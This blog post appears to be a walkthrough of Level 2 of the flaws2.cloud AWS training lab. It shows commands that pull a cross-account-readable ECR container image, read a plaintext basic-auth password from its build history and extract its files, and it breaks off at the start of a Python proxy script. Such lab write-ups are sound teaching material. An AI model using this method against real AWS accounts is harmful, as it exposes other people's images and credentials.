<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta name="generator" content="Hugo 0.56.3" />
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> | text/plain</title>
    <meta name="description" content="Level 2 Now we have a container-based application running at container.target.flaws2.cloud. The hint is that the repository containing its image is called &ldquo;level2&rdquo;.
Note: you will need your own AWS account to give yourself access to ECR.
Explore the application We go to container.target.flaws2.cloud with a browser and all we get is a basic auth prompt. Let&rsquo;s just assume it is uncrackable.
IMG 01
Checking out the details we can see it is hosted on Ubuntu, with nginx 1.">
    <meta name="keywords" content="aws, hackthebox, misc, steganography, ">
    
    
    
    
    

  <meta name="author" content="Dominic Breuker">


    <meta property="og:title" content="" />
<meta property="og:description" content="Level 2 Now we have a container-based application running at container.target.flaws2.cloud. The hint is that the repository containing its image is called &ldquo;level2&rdquo;.
Note: you will need your own AWS account to give yourself access to ECR.
Explore the application We go to container.target.flaws2.cloud with a browser and all we get is a basic auth prompt. Let&rsquo;s just assume it is uncrackable.
IMG 01
Checking out the details we can see it is hosted on Ubuntu, with nginx 1." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dominicbreuker.com/post/21_flaws2_cloud_2/" />

<meta property="og:image" content="https://source.unsplash.com/category/technology/2000x1322" />


    



  <meta property="og:image" content="https://source.unsplash.com/category/technology/2000x1322">


    <meta name="theme-color" content="#000">

    
    
    
    <link rel="canonical" href="https://dominicbreuker.com/post/21_flaws2_cloud_2/">
    
    
    <link rel="icon" sizes="any" href="data:image/svg+xml,%3Csvg%20viewBox='0%200%2046%2045'%20xmlns='http://www.w3.org/2000/svg'%3E%3Ctitle%3EAfter%20Dark%3C/title%3E%3Cpath%20d='M.708%2045L23%20.416%2045.292%2045H.708zM35%2038L23%2019%2011%2038h24z'%20fill='%23000'/%3E%3C/svg%3E">

    <style>
  html{font-size:12px}*{box-sizing:border-box;text-rendering:geometricPrecision}body{font-size:1rem;line-height:1.5rem;margin:0;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif;word-wrap:break-word}h1,h2,h3,h4,h5,h6{line-height:1.3em}fieldset{border:none;padding:0;margin:0}pre{padding:2rem;margin:1.75rem 0;background-color:#fff;border:1px solid #ccc;overflow:auto}code[class*=language-],pre[class*=language-],pre code{font-weight:100;text-shadow:none;margin:1.75rem 0}a{cursor:pointer;color:#ff2e88;text-decoration:none;border-bottom:1px solid #ff2e88}a:hover{background-color:#ff2e88;color:#fff}.grid{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap}.grid.\-top{-ms-flex-align:start;-ms-grid-row-align:flex-start;align-items:flex-start}.grid.\-middle{-ms-flex-align:center;-ms-grid-row-align:center;align-items:center}.grid.\-bottom{-ms-flex-align:end;-ms-grid-row-align:flex-end;align-items:flex-end}.grid.\-stretch{-ms-flex-align:stretch;-ms-grid-row-align:stretch;align-items:stretch}.grid.\-baseline{-ms-flex-align:baseline;-ms-grid-row-align:baseline;align-items:baseline}.grid.\-left{-ms-flex-pack:start;justify-content:flex-start}.grid.\-center{-ms-flex-pack:center;justify-content:center}.grid.\-right{-ms-flex-pack:end;justify-content:flex-end}.grid.\-between{-ms-flex-pack:justify;justify-content:space-between}.grid.\-around{-ms-flex-pack:distribute;justify-content:space-around}.cell{-ms-flex:1;flex:1;box-sizing:border-box}@media screen and (min-width:768px){.cell.\-1of12{-ms-flex:0 0 8.33333%;flex:0 0 8.33333%}.cell.\-2of12{-ms-flex:0 0 16.66667%;flex:0 0 16.66667%}.cell.\-3of12{-ms-flex:0 0 25%;flex:0 0 25%}.cell.\-4of12{-ms-flex:0 0 33.33333%;flex:0 0 33.33333%}.cell.\-5of12{-ms-flex:0 0 41.66667%;flex:0 0 41.66667%}.cell.\-6of12{-ms-flex:0 0 50%;flex:0 0 50%}.cell.\-7of12{-ms-flex:0 0 58.33333%;flex:0 0 58.33333%}.cell.\-8of12{-ms-flex:0 0 66.66667%;flex:0 0 66.66667%}.cell.\-9of12{-ms-flex:0 0 75%;flex:0 0 75%}.cell.\-10of12{-ms-flex:0 0 83.33333%;flex:0 0 83.33333%}.cell.\-11of12{-ms-flex:0 0 91.66667%;flex:0 0 91.66667%}}@media screen and (max-width:768px){.grid{-ms-flex-direction:column;flex-direction:column}.cell{-ms-flex:0 0 auto;flex:0 0 auto}}.hack,.hack blockquote,.hack code,.hack em,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack strong{font-size:1rem;font-style:normal;font-family:Menlo,Monaco,Lucida Console,Liberation Mono,DejaVu Sans Mono,Bitstream Vera Sans Mono,Courier New,monospace,serif}.hack blockquote,.hack code,.hack em,.hack strong{line-height:20px}.hack blockquote,.hack code,.hack footer,.hack h1,.hack h2,.hack h3,.hack h4,.hack h5,.hack h6,.hack header,.hack li,.hack ol,.hack p,.hack section,.hack ul{float:none;margin:0;padding:0}.hack blockquote,.hack h1,.hack ol,.hack p,.hack ul{margin-top:20px;margin-bottom:20px}.hack h1{position:relative;display:inline-block;display:table-cell;padding:20px 0 30px;margin:0;overflow:hidden}.hack h1:after{content:"====================================================================================================";position:absolute;bottom:10px;left:0}.hack h1+*{margin-top:0}.hack h2,.hack h3,.hack h4,.hack h5,.hack h6{position:relative;margin-bottom:1.75rem}.hack h2:before,.hack h3:before,.hack h4:before,.hack h5:before,.hack h6:before{display:inline}.hack h2:before{content:"## "}.hack h3:before{content:"### "}.hack h4:before{content:"#### "}.hack h5:before{content:"##### "}.hack h6:before{content:"###### "}.hack li{position:relative;display:block;padding-left:20px}.hack li:after{position:absolute;top:0;left:0}.hack ul>li:after{content:"-"}.hack ol{counter-reset:a}.hack ol>li:after{content:counter(a) ".";counter-increment:a}.hack blockquote{position:relative;padding-left:17px;padding-left:2ch;overflow:hidden}.hack blockquote:after{content:">\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>\A>";white-space:pre;position:absolute;top:0;left:0;line-height:20px}.hack em:after,.hack em:before{content:"*";display:inline}.hack pre code:after,.hack pre code:before{content:''}.hack code{font-weight:700}.hack code:after,.hack code:before{content:"`";display:inline}.hack hr{position:relative;height:20px;overflow:hidden;border:0;margin:20px 0}.hack hr:after{content:"----------------------------------------------------------------------------------------------------";position:absolute;top:0;left:0;line-height:20px;width:100%;word-wrap:break-word}@-moz-document url-prefix(){.hack h1{display:block}}.hack-ones ol>li:after{content:"1."}p{margin:0 0 1.75rem}.container{max-width:70rem}.container,.container-fluid{margin:0 auto;padding:0 1rem}.inner{padding:1rem}.inner2x{padding:2rem}.pull-left{float:left}.pull-right{float:right}.progress-bar{height:8px;opacity:.8;background-color:#ccc;margin-top:12px}.progress-bar.progress-bar-show-percent{margin-top:38px}.progress-bar-filled{background-color:gray;height:100%;transition:width .3s ease;position:relative;width:0}.progress-bar-filled:before{content:'';border:6px solid transparent;border-top-color:gray;position:absolute;top:-12px;right:-6px}.progress-bar-filled:after{color:gray;content:attr(data-filled);display:block;font-size:12px;white-space:nowrap;position:absolute;border:6px solid transparent;top:-38px;right:0;-ms-transform:translateX(50%);transform:translateX(50%)}table{width:100%;border-collapse:collapse;margin:1.75rem 0;color:#778087}table td,table th{vertical-align:top;border:1px solid #ccc;line-height:15px;padding:10px}table thead th{font-size:10px}table tbody td:first-child{font-weight:700;color:#333}.form{width:30rem}.form-group{margin-bottom:1.75rem;overflow:auto}.form-group label{border-bottom:2px solid #ccc;color:#333;width:10rem;display:inline-block;height:38px;line-height:38px;padding:0;float:left;position:relative}.form-group.form-success label{color:#4caf50!important;border-color:#4caf50!important}.form-group.form-warning label{color:#ff9800!important;border-color:#ff9800!important}.form-group.form-error label{color:#f44336!important;border-color:#f44336!important}.form-control{outline:none;border:none;border-bottom:2px solid #ccc;padding:.5rem 0;width:20rem;height:38px;background-color:transparent}.form-control:focus{border-color:#555}.form-group.form-textarea label:after{position:absolute;content:'';width:2px;background-color:#fff;right:-2px;top:0;bottom:0}textarea.form-control{height:auto;resize:none;padding:1rem 0;border-bottom:2px solid #ccc;border-left:2px solid #ccc;padding:.5rem}select.form-control{border-radius:0;background-color:transparent;-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none}.help-block{color:#999;margin-top:.5rem}.form-actions{margin-bottom:1.75rem}.btn{display:-ms-inline-flexbox;display:inline-flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;cursor:pointer;outline:none;padding:.65rem 2rem;font-size:1rem;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;position:relative;z-index:1}.btn:active{box-shadow:inset 0 1px 3px rgba(0,0,0,.12)}.btn.btn-ghost{border-color:#757575;color:#757575;background-color:transparent}.btn.btn-ghost:focus,.btn.btn-ghost:hover{border-color:#424242;color:#424242;z-index:2}.btn.btn-ghost:hover{background-color:transparent}.btn-block{width:100%;display:-ms-flexbox;display:flex}.btn-default{color:#fff;background-color:#e0e0e0;border:1px solid #e0e0e0;color:#333}.btn-default:focus:not(.btn-ghost),.btn-default:hover{background-color:#dcdcdc;border-color:#dcdcdc}.btn-success{color:#fff;background-color:#4caf50;border:1px solid #4caf50}.btn-success:focus:not(.btn-ghost),.btn-success:hover{background-color:#43a047;border-color:#43a047}.btn-success.btn-ghost{border-color:#4caf50;color:#4caf50}.btn-success.btn-ghost:focus,.btn-success.btn-ghost:hover{border-color:#388e3c;color:#388e3c;z-index:2}.btn-error{color:#fff;background-color:#f44336;border:1px solid #f44336}.btn-error:focus:not(.btn-ghost),.btn-error:hover{background-color:#e53935;border-color:#e53935}.btn-error.btn-ghost{border-color:#f44336;color:#f44336}.btn-error.btn-ghost:focus,.btn-error.btn-ghost:hover{border-color:#d32f2f;color:#d32f2f;z-index:2}.btn-warning{color:#fff;background-color:#ff9800;border:1px solid #ff9800}.btn-warning:focus:not(.btn-ghost),.btn-warning:hover{background-color:#fb8c00;border-color:#fb8c00}.btn-warning.btn-ghost{border-color:#ff9800;color:#ff9800}.btn-warning.btn-ghost:focus,.btn-warning.btn-ghost:hover{border-color:#f57c00;color:#f57c00;z-index:2}.btn-info{color:#fff;background-color:#00bcd4;border:1px solid #00bcd4}.btn-info:focus:not(.btn-ghost),.btn-info:hover{background-color:#00acc1;border-color:#00acc1}.btn-info.btn-ghost{border-color:#00bcd4;color:#00bcd4}.btn-info.btn-ghost:focus,.btn-info.btn-ghost:hover{border-color:#0097a7;color:#0097a7;z-index:2}.btn-primary{color:#fff;background-color:#2196f3;border:1px solid #2196f3}.btn-primary:focus:not(.btn-ghost),.btn-primary:hover{background-color:#1e88e5;border-color:#1e88e5}.btn-primary.btn-ghost{border-color:#2196f3;color:#2196f3}.btn-primary.btn-ghost:focus,.btn-primary.btn-ghost:hover{border-color:#1976d2;color:#1976d2;z-index:2}.btn-group{overflow:auto}.btn-group .btn{float:left}.btn-group .btn-ghost:not(:first-child){margin-left:-1px}.card{border:1px solid #ccc}.card .card-header{color:#333;text-align:center;background-color:#ddd;padding:.5rem 0}.alert{color:#ccc;padding:1rem;border:1px solid #ccc;margin-bottom:1.75rem}.alert-success{color:#4caf50;border-color:#4caf50}.alert-error{color:#f44336;border-color:#f44336}.alert-info{color:#00bcd4;border-color:#00bcd4}.alert-warning{color:#ff9800;border-color:#ff9800}.media:not(:last-child){margin-bottom:1.25rem}.media-left{padding-right:1rem}.media-left,.media-right{display:table-cell;vertical-align:top}.media-right{padding-left:1rem}.media-body{display:table-cell;vertical-align:top}.media-heading{font-size:1.16667rem;font-weight:700}.media-content{margin-top:.3rem}.avatarholder,.placeholder{background-color:#f0f0f0;text-align:center;color:#b9b9b9;font-size:1rem;border:1px solid #f0f0f0}.avatarholder{width:48px;height:48px;line-height:46px;font-size:2rem;background-size:cover;background-position:50%;background-repeat:no-repeat}.avatarholder.rounded{border-radius:33px}.loading{display:inline-block;content:'&nbsp;';height:20px;width:20px;margin:0 .5rem;animation:a .6s infinite linear;border:2px solid #e91e63;border-right-color:transparent;border-radius:50%}.btn .loading{margin-bottom:0;width:14px;height:14px}.btn div.loading{float:left}.alert .loading{margin-bottom:-5px}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(1turn)}}.menu{width:100%}.menu .menu-item{display:block;color:#616161;border-color:#616161}.menu .menu-item.active,.menu .menu-item:hover{color:#000;border-color:#000;background-color:transparent}@media screen and (max-width:768px){.form-group label{display:block;border-bottom:none;width:100%}.form-group.form-textarea label:after{display:none}.form-control{width:100%}textarea.form-control{border-left:none;padding:.5rem 0}pre::-webkit-scrollbar{height:3px}}@media screen and (max-width:480px){.form{width:100%}}.dark{color:#ccc}.dark,.dark pre{background-color:#000}.dark pre{padding:0;border:none}.dark pre code{color:#00bcd4}.dark h1 a,.dark h2 a,.dark h3 a,.dark h4 a,.dark h5 a{color:#ccc}.dark code,.dark strong{color:#fff}.dark code{font-weight:100}.dark table{color:#ccc}.dark table td,.dark table th{border-color:#444}.dark table tbody td:first-child{color:#fff}.dark .form-group label{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-group.form-textarea label:after{background-color:#000}.dark .form-control{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .form-control:focus{border-color:#ccc;color:#ccc}.dark textarea.form-control{color:#ccc}.dark .card{border-color:rgba(95,95,95,.78)}.dark .card .card-header{background-color:transparent;color:#ccc;border-bottom:1px solid rgba(95,95,95,.78)}.dark .btn.btn-ghost.btn-default{border-color:#ababab;color:#ababab}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#9c9c9c;color:#9c9c9c;z-index:1}.dark .btn.btn-ghost.btn-default:focus,.dark .btn.btn-ghost.btn-default:hover{border-color:#e0e0e0;color:#e0e0e0}.dark .btn.btn-ghost.btn-primary:focus,.dark .btn.btn-ghost.btn-primary:hover{border-color:#64b5f6;color:#64b5f6}.dark .btn.btn-ghost.btn-success:focus,.dark .btn.btn-ghost.btn-success:hover{border-color:#81c784;color:#81c784}.dark .btn.btn-ghost.btn-info:focus,.dark .btn.btn-ghost.btn-info:hover{border-color:#4dd0e1;color:#4dd0e1}.dark .btn.btn-ghost.btn-error:focus,.dark .btn.btn-ghost.btn-error:hover{border-color:#e57373;color:#e57373}.dark .btn.btn-ghost.btn-warning:focus,.dark .btn.btn-ghost.btn-warning:hover{border-color:#ffb74d;color:#ffb74d}.dark .avatarholder,.dark .placeholder{background-color:transparent;border-color:#333}.dark .menu .menu-item{color:#ccc;border-color:rgba(95,95,95,.78)}.dark .menu .menu-item.active,.dark .menu .menu-item:hover{color:#fff;border-color:#ccc}
  :root {
  --screen-size-small: 30em; /* breakpoint reference only */
}
@keyframes intro {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
.muted {
  color: rgba(255, 255, 255, 0.5);
}
.readmore {
  margin-bottom: 2.2em;
}
.responsive-iframe {
  position: relative;
  padding-bottom: 56.25%; /* 16:9 */
  padding-top: 25px;
  height: 0;
}
.responsive-iframe iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
iframe {
  border: 0;
}
main, footer {
  animation: intro 0.3s both;
  animation-delay: 0.15s;
}
footer time[datetime$="M"]:before {
  content: "\2013\0020";
}
@media only screen
  and ( max-width: 30em ) {
  footer time[datetime$="M"] {
    display: none;
  }
}
blockquote cite {
  display: block;
}
blockquote cite::before {
   content: "\2014";
}
:target {
  color: #fff;
}
/* hack.css overrides and enhancements */
.hack li ul {
  margin: 0;
}
.main {
  padding: 20px 10px;
}
nav a.active {
  background-color: #ff2e88;
  color: #fff;
}
a[itemprop="url"] {
  color: #ff9800;
}
a[itemprop="url"]:hover {
  color: #fff;
}
a[href*="://"]::after,
a[rel*="external"] {
  content: " " url("data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20class='i-external'%20viewBox='0%200%2032%2032'%20width='14'%20height='14'%20fill='none'%20stroke='%23ff9800'%20stroke-linecap='round'%20stroke-linejoin='round'%20stroke-width='9.38%'%3E%3Cpath%20d='M14%209%20L3%209%203%2029%2023%2029%2023%2018%20M18%204%20L28%204%2028%2014%20M28%204%20L14%2018'/%3E%3C/svg%3E");
}
figure a[href*="://"]::after,
figure a[rel*="external"] {
  content: "";
}
html {
  font-size: 13px;
}
.hack pre {
  font-size: 17px;
}
article [itemprop="description"] {
  margin-bottom: 20px;
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  html {
    font-size: 1em;
  }
  .container {
    max-width: 50rem;
  }
}

  nav a.active {
  background-color: #33cc33; /*ff2e88*/
  color: #fff;
}
a[itemprop="url"] {
  color: #339933; /*ff9800*/
}
a[itemprop="url"]:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

.dark pre code {
  color: #248f24;
}

.dark code {
  color: #248f24;
}

a {
  color: #339933; /*ff9800*/
  border-bottom: 1px solid #33cc33;
}

a:hover {
  color: #fff;
  background-color: #33cc33; /*ff2e88*/
}

/* custom styles */
figure {
  margin-left: auto;
  margin-right: auto;
  text-align: center;
}
figure img {
  max-width: 100%;
}
figure a {
  border-bottom: none !important;
}
figure a:hover {
  background-color: inherit !important;
}

</style>

    
    
    
      <script async src="/js/bpgdec8a.js"></script>
      <script async src="/js/bpgdec8.js"></script>
      <script async src="/js/bpgdec.js"></script>
    
  </head>
  
  <body class="hack dark main container">
    <header>
  
  <nav itemscope itemtype="http://schema.org/SiteNavigationElement">
    
    
      <a itemprop="url" class="" href="/"><span itemprop="name">Home</span></a>
    
      <a itemprop="url" class="active" href="/post/"><span itemprop="name">Post</span></a>
    
      <a itemprop="url" class="" href="/about/"><span itemprop="name">About</span></a>
    
  </nav>


</header>
    <main>
  <article itemscope itemtype="http://schema.org/BlogPosting">
    <meta itemprop="name" content="">
<meta itemprop="description" content="Level 2 Now we have a container-based application running at container.target.flaws2.cloud. The hint is that the repository containing its image is called &ldquo;level2&rdquo;.
Note: you will need your own AWS account to give yourself access to ECR.
Explore the application We go to container.target.flaws2.cloud with a browser and all we get is a basic auth prompt. Let&rsquo;s just assume it is uncrackable.
IMG 01
Checking out the details we can see it is hosted on Ubuntu, with nginx 1.">



<meta itemprop="wordCount" content="1273">



<meta itemprop="keywords" content="" />

    <script async src="/js/baffle.js"></script>
    <header>
      <h1 class="baffle" itemprop="headline"></h1>
      <p class="muted">
        <svg style="margin-bottom:-3px" class="i-clock" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <circle cx="16" cy="16" r="14" />
  <path d="M16 8 L16 16 20 20" />
</svg>
<span>6 minute read</span>
<svg style="margin-bottom: -3px" class="i-edit" viewBox="0 0 32 32" width="16" height="16" fill="none" stroke="currentcolor" stroke-linecap="round" stroke-linejoin="round" stroke-width="6.25%">
  <path d="M30 7 L25 2 5 22 3 29 10 27 Z M21 6 L26 11 Z M5 22 L10 27 Z" />
</svg>

  Published: <time datetime="0001-01-01T00:00:00&#43;00:00">1 Jan, 0001</time>


      </p>
    </header>
    
    

    <div itemprop="articleBody">
      

<h1 id="level-2">Level 2</h1>

<p>Now we have a container-based application running at
<a href="http://container.target.flaws2.cloud/">container.target.flaws2.cloud</a>.
The hint is that the repository containing its image is called &ldquo;level2&rdquo;.</p>

<p>Note: you will need your own AWS account to give yourself access to ECR.</p>

<h2 id="explore-the-application">Explore the application</h2>

<p>We go to <a href="http://container.target.flaws2.cloud/">container.target.flaws2.cloud</a>
with a browser and all we get is a basic auth prompt.
Let&rsquo;s just assume it is uncrackable.</p>

<p>IMG 01</p>

<p>Checking out the details we can see it is hosted on Ubuntu, with nginx 1.10.3:</p>

<pre><code> # curl -i http://container.target.flaws2.cloud/
HTTP/1.1 401 Unauthorized
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 21 Nov 2019 15:36:25 GMT
Content-Type: text/html
Content-Length: 204
Connection: keep-alive
WWW-Authenticate: Basic realm=&quot;Restricted Content&quot;

&lt;html&gt;
&lt;head&gt;&lt;title&gt;401 Authorization Required&lt;/title&gt;&lt;/head&gt;
&lt;body bgcolor=&quot;white&quot;&gt;
&lt;center&gt;&lt;h1&gt;401 Authorization Required&lt;/h1&gt;&lt;/center&gt;
&lt;hr&gt;&lt;center&gt;nginx/1.10.3 (Ubuntu)&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>

<p>Our usual DNS check reveals that the site is powered by EC2:</p>

<pre><code> # dig container.target.flaws2.cloud
...
container.target.flaws2.cloud. 299 IN   A       3.85.224.200
...
 # dig -x 3.85.224.200
...
200.224.85.3.in-addr.arpa. 299  IN      PTR     ec2-3-85-224-200.compute-1.amazonaws.com.
...
</code></pre>

<p>The fact that there is no region in the DNS name means the region is &ldquo;us-east-1&rdquo;,
also called &ldquo;US East (N. Virginia)&rdquo; (see AWS docs on
<a href="https://docs.aws.amazon.com/vpc/latest/userguide/vpc-dns.html">VPC and DNS</a>).
Run <code>export AWS_DEFAULT_REGION=us-east-1</code> to make your client use it.</p>

<h2 id="testing-for-ecr-repositories">Testing for ECR repositories</h2>

<p>Now create yourself an IAM user inside your own AWS account.
Make sure it has programmatic access (for API access with keys)
and give it the &ldquo;AmazonEC2ContainerRegistryFullAccess&rdquo; policy,
which is Amazons pre-built policy allowing you to do anything with ECR.
Compare the screenshot below to see how to attach the policy.</p>

<p>IMG 02</p>

<p>When done, note the key and secret and also source them into your shell
session:</p>

<pre><code> # export AWS_ACCESS_KEY_ID=&lt;put-key-id-here&gt;
 # export AWS_SECRET_ACCESS_KEY=&lt;put-secret-here&gt;
</code></pre>

<p>In the previous level we learned the AWS account ID, which is &ldquo;653711331788&rdquo;.
We could now attempt to describe repositories with <code>aws ecr describe-repositories --registry-id 653711331788</code>.
However we only get access denied back.</p>

<p>Still this does not mean we can&rsquo;t access a repository if we happen to know the
name. It is a common use case to grant other AWS accounts read or write access
to specific repositories (see the <a href="https://aws.amazon.com/premiumsupport/knowledge-center/secondary-account-access-ecr/">AWS knowlege base</a>
and <a href="https://docs.aws.amazon.com/AmazonECR/latest/userguide/RepositoryPolicyExamples.html#IAM_allow_other_accounts">documentation</a>).</p>

<p>We could just go through a list of probable names and test access. In this
case, the hint tells us to look for one called &ldquo;level2&rdquo;. And indeed, the user
inside our account can describe the images in the target account&rsquo;s &ldquo;level2&rdquo;
repository. We find one image:</p>

<pre><code> # aws ecr describe-images --registry-id 653711331788 --repository-name level2
{
    &quot;imageDetails&quot;: [
        {
            &quot;registryId&quot;: &quot;653711331788&quot;,
            &quot;repositoryName&quot;: &quot;level2&quot;,
            &quot;imageDigest&quot;: &quot;sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e&quot;,
            &quot;imageTags&quot;: [
                &quot;latest&quot;
            ],
            &quot;imageSizeInBytes&quot;: 75937660,
            &quot;imagePushedAt&quot;: 1543289656.0
        }
    ]
}
</code></pre>

<h2 id="logging-into-ecr">Logging into ECR</h2>

<p>Now we try to download the image. First we need credentials to log into the
repository with a local Docker client. The output is very long so I have
shortened it below:</p>

<pre><code> # aws ecr get-login --registry-ids 653711331788
docker login -u AWS -p eyJw...MDN9 -e none https://653711331788.dkr.ecr.us-east-1.amazonaws.com
</code></pre>

<p>You need the <a href="https://docs.docker.com/engine/reference/commandline/cli/">Docker CLI</a>
installed to use it. Note you may have to delete &ldquo;-e none&rdquo; if your client does
not know the flag. If it works it should say &ldquo;Login Succeeded&rdquo;, possibly also
complaining about the fact that we just passed a password as a command line
argument (see <a href="https://github.com/DominicBreuker/pspy">pspy</a> to understand why
that may be a bad idea).</p>

<p>Go ahead an pull the image:</p>

<pre><code> # docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
latest: Pulling from level2
7b8b6451c85f: Pull complete
ab4d1096d9ba: Pull complete
e6797d1788ac: Pull complete
e25c5c290bde: Pull complete
96af0e137711: Pull complete
2057ef5841b5: Pull complete
e4206c7b02ec: Pull complete
501f2d39ea31: Pull complete
f90fb73d877d: Pull complete
4fbdfdaee9ae: Pull complete
Digest: sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e
Status: Downloaded newer image for 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
</code></pre>

<p>Inspect the image and you find quite some details about how it is used:</p>

<pre><code> # docker inspect 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
[
    {
        &quot;Id&quot;: &quot;sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621&quot;,
        &quot;RepoTags&quot;: [ &quot;653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest&quot; ],
        &quot;RepoDigests&quot;: [ &quot;653711331788.dkr.ecr.us-east-1.amazonaws.com/level2@sha256:513e7d8a5fb9135a61159fbfbc385a4beb5ccbd84e5755d76ce923e040f9607e&quot; ],
        ...
        &quot;Created&quot;: &quot;2018-11-27T03:32:59.959842964Z&quot;,
        &quot;Container&quot;: &quot;ac1212c533fd9920b36cf3518caeb27b07e5efca6d40a0cfb07acc94c3f02055&quot;,
        &quot;ContainerConfig&quot;: {
            &quot;Hostname&quot;: &quot;ac1212c533fd&quot;,
            ...
            &quot;ExposedPorts&quot;: { &quot;80/tcp&quot;: {} },
            ...
            &quot;Cmd&quot;: [ &quot;/bin/sh&quot;, &quot;-c&quot;, &quot;#(nop) &quot;, &quot;CMD [\&quot;sh\&quot; \&quot;/var/www/html/start.sh\&quot;]&quot; ],
            ...
        },
        ...
        &quot;Os&quot;: &quot;linux&quot;,
        ...
    }
]
</code></pre>

<p>Check out the history to see how it was built (add <code>--no-trunc</code> for full
output, which is looooong):</p>

<pre><code> $ docker image history 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
2d73de35b781        11 months ago       /bin/sh -c #(nop)  CMD [&quot;sh&quot; &quot;/var/www/html/…   0B
&lt;missing&gt;           11 months ago       /bin/sh -c #(nop)  EXPOSE 80                    0B
&lt;missing&gt;           11 months ago       /bin/sh -c #(nop) ADD file:d29d68489f34ad718…   49B
&lt;missing&gt;           11 months ago       /bin/sh -c #(nop) ADD file:f8fd45be7a30bffa5…   614B
&lt;missing&gt;           11 months ago       /bin/sh -c #(nop) ADD file:fd3724e587d17e4bc…   1.89kB
&lt;missing&gt;           11 months ago       /bin/sh -c #(nop) ADD file:b311a5fa51887368e…   999B
&lt;missing&gt;           11 months ago       /bin/sh -c htpasswd -b -c /etc/nginx/.htpass…   45B
&lt;missing&gt;           11 months ago       /bin/sh -c apt-get update     &amp;&amp; apt-get ins…   85.5MB
&lt;missing&gt;           12 months ago       /bin/sh -c #(nop)  CMD [&quot;/bin/bash&quot;]            0B
&lt;missing&gt;           12 months ago       /bin/sh -c mkdir -p /run/systemd &amp;&amp; echo 'do…   7B
&lt;missing&gt;           12 months ago       /bin/sh -c rm -rf /var/lib/apt/lists/*          0B
&lt;missing&gt;           12 months ago       /bin/sh -c set -xe   &amp;&amp; echo '#!/bin/sh' &gt; /…   745B
&lt;missing&gt;           12 months ago       /bin/sh -c #(nop) ADD file:efec03b785a78c01a…   116MB
</code></pre>

<p>One line contains &ldquo;htpasswd&rdquo;, which is interesting.
In the <code>--no-trunc</code> output you would find the following content:
<code>/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd flaws2 secret_password</code>.
Looks like we got the password.
Type these credentials (flaws2 / secret_password) into the prompt and you get
to the final page. It tells you where the next level is:</p>

<p>IMG 03</p>

<h3 id="find-link-from-files">Find link from files</h3>

<p>A good developer may not have left the password in plaintext in the dockerfile.
If that had been the case, we could also just extract the image and read the
source.
Check out the files:</p>

<pre><code>/tmp/flaws2 # docker create --name=&quot;flaws2-level2&quot; 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
4b6247c4df4d39g462c351734b39a873dge1575e76419ed78e921ed24f198509
/tmp/flaws2 # docker export flaws2-level2 | tar -x
...
lots of errors
...
/tmp/flaws2 # ls
bin/  boot/  dev/  etc/  home/  lib/  lib64/  media/  mnt/  opt/  proc/  root/  run/  sbin/  srv/  sys/  tmp/  usr/
</code></pre>

<p>Check the startup script:</p>

<pre><code>/tmp/flaws2 # cat var/www/html/start.sh
#!/bin/bash
python /var/www/html/proxy.py &amp;
nginx
</code></pre>

<p>This proxy.py file is a small python web server serving pages out of the
directory it is in:</p>
<div class="highlight" style="background: #272822"><pre style="line-height: 125%"><code class="language-python" data-lang="python"><span></span><span style="color: #f92672">import</span> <span style="color: #f8f8f2">SocketServer</span>
<span style="color: #f92672">import</span> <span style="color: #f8f8f2">SimpleHTTPServer</span>
<span style="color: #f92672">import</span> <span style="color: #f8f8f2">urllib</span>
<span style="color: #f92672">import</span> <span style="color: #f8f8f2">os</span>

<span style="color: #f8f8f2">PORT</span> <span style="color: #f92672">=</span> <span style="color: #ae81ff">8000</span>

<span style="color: #66d9ef">class</span> <span style="color: #a6e22e">Proxy</span><span style="color: #f8f8f2">(SimpleHTTPServer</span><span style="color: #f92672">.</span><span style="color: #f8f8f2">SimpleHTTPRequestHandler):</span>
